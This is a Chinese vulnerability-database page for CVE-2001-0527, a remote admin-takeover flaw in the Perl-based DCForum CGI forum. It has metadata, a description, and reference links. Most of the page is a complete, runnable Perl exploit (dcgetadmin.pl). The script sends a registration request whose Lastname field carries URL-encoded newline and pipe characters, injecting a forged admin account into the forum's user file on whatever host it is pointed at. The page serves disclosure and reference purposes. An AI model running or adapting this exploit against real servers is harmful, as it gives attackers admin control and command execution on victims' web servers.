DCForum远程可获得管理权限漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1106340 漏洞类型 输入验证
发布时间 2001-05-08 更新时间 2005-05-02
CVE编号 CVE-2001-0527 CNNVD-ID CNNVD-200108-061
漏洞平台 CGI CVSS评分 10.0
|漏洞来源
https://www.exploit-db.com/exploits/20849
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200108-061
|漏洞详情
DCForum是一种基于WEB的会议系统,设计用于在线讨论。它是用Perl实现的,几乎没有系统相关性,可以运行于Linux、Windows以及绝大多数Unix变体上。一些版本的DCForum存在漏洞,远程攻击者可以利用这个漏洞获得DCForum的管理权限甚至执行任意命令。DCForum维护着一个文件包含用户账号信息,包含用户口令的哈希值和其它敏感信息。当建立一个新账号的适合,用户信息会被写入这个文件,一个用户信息一行,每一项记录用管道符('|')隔开。DCForum对用户输入的信息检查不严,攻击者可以在用户信息最后一项的最后输入URL编码的管道符和换行符就可以在后面再任意添加用户到用户信息文件,攻击者可以指定管理权限。DCForum有管理权限的账号可能以Web服务器的权限执行任意命令。
|漏洞EXP
#source: http://www.securityfocus.com/bid/2728/info
#
#DCForum is a commercial cgi script from DCScripts which is designed to facilitate web-based threaded discussion forums.
#
#Versions of DCForum are vulnerable to attacks which can yield an elevation of privileges and remote execution of arbitrary commands.
#
#DCForum maintains a file containing its user account information, including hashed user passwords and other potentially sensitive information.
#
#When a new user account is created, the user's information is written to this file. Fields within each record are delimited by pipe ('|') and newline characters.
#
#DCForum fails to properly validate this user-supplied account information. As a result, an attacker can cause a corruption of the script's user records by providing a value for the last name field which includes URL-encoded pipes and newlines. By appending desired values to the last name field, an attacker can insert account information for a new user, and specify admin privileges.
#
#This newly-created admin account allows a remote attacker to issue arbitrary commands with the privilege level of the webserver process. 
#

#!/usr/bin/perl

# dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin@qDefense.com


use Getopt::Std;
use IO::Socket;

getopts ('ap');

usage () unless ($#ARGV == 0 || $#ARGV == 1);
if ($opt_a) { print "\n -a not implemented yet\n\n"; exit 1; }

$host = $ARGV[0];
$uri =  $ARGV[1] ? $ARGV[1] : '/cgi-bin/dcforum/dcboard.cgi';

$username = 'evilhacker' .  ( int rand(9899) + 100); 
$password = int rand  (9899) + 100;
$hash = $opt_p ? $password : crypt ($password, substr ($password, 0, 2));
$dummyuser = 'not' . ( int rand(9899) + 100) ;
$dummypass = int rand (9899) + 100;

print "\n(Debugging info: Hash = $hash    Dummyuser = $dummyuser    Dummypass =
$dummypass)\n";
print "Attempting to register username $username with password $password as admin . . .\n";

$sock = IO::Socket::INET->new("$host:80") or die "Unable to connect to $host: $!\n\n";
$req = "GET
$uri?command=register&az=user_register&Username=$dummyuser&Password=$dummypass&dup_Password=$dummypass";
$req .=
"&Firstname=Proof&Lastname=Concept%0a$hash%7c$username%7cadmin%7cProof%7cConcept&EMail=nothere%40nomail.com";
$req .= "&required=Password%2cUsername%2cFirstname%2cLastname%2cEMail HTTP/1.0\015\012";
$req .= "Host: $host\015\012\015\012";

print $sock $req;

print "The server replied:\n\n";

while (<$sock>)
{
  if (/BODY/) { $in_body = 1; }
  next unless $in_body;
  if (/form|<\/BODY>/) { last; }
  s/<.+?>//g;
  print $_ unless (/^\s*$/);
}
  print "\nNote: Even if your password is supposed to be e-mailed to you, it should work
right away.\n";


sub usage
{
  print <<EOF;
dcgetadmin.pl - (C) 2001 Franklin DeMatto - franklin\@qDefense.com

Usage: $0 [options] host [path to dcboard.cgi]

Options:
   -a to activate the account (for sites that do not activate automatically)
  NOTE: This option is not yet supported, but should be quite easy to add if you need it
  
  -p to leave the password in plaintext (necessary when the target is NT)

The path to dcboard.cgi, if not supplied, is assumed to be /cgi-bin/dcforum/dcboard.cgi

EOF
  exit 1;
}
|参考资料

来源:XF
名称:dcforum-cgi-admin-access(6538)
链接:http://xforce.iss.net/static/6538.php
来源:www.dcscripts.com
链接:http://www.dcscripts.com/dcforum/dcfNews/167.html
来源:BUGTRAQ
名称:20010515DCForumPasswordFileManipukationVulnerability(qDefenseAdvisoryNumberQDAV-5-2000-2)
链接:http://archives.neohapsis.com/archives/bugtraq/2001-05/0122.html
来源:BID
名称:2728
链接:http://www.securityfocus.com/bid/2728
来源:OSVDB
名称:480
链接:http://www.osvdb.org/480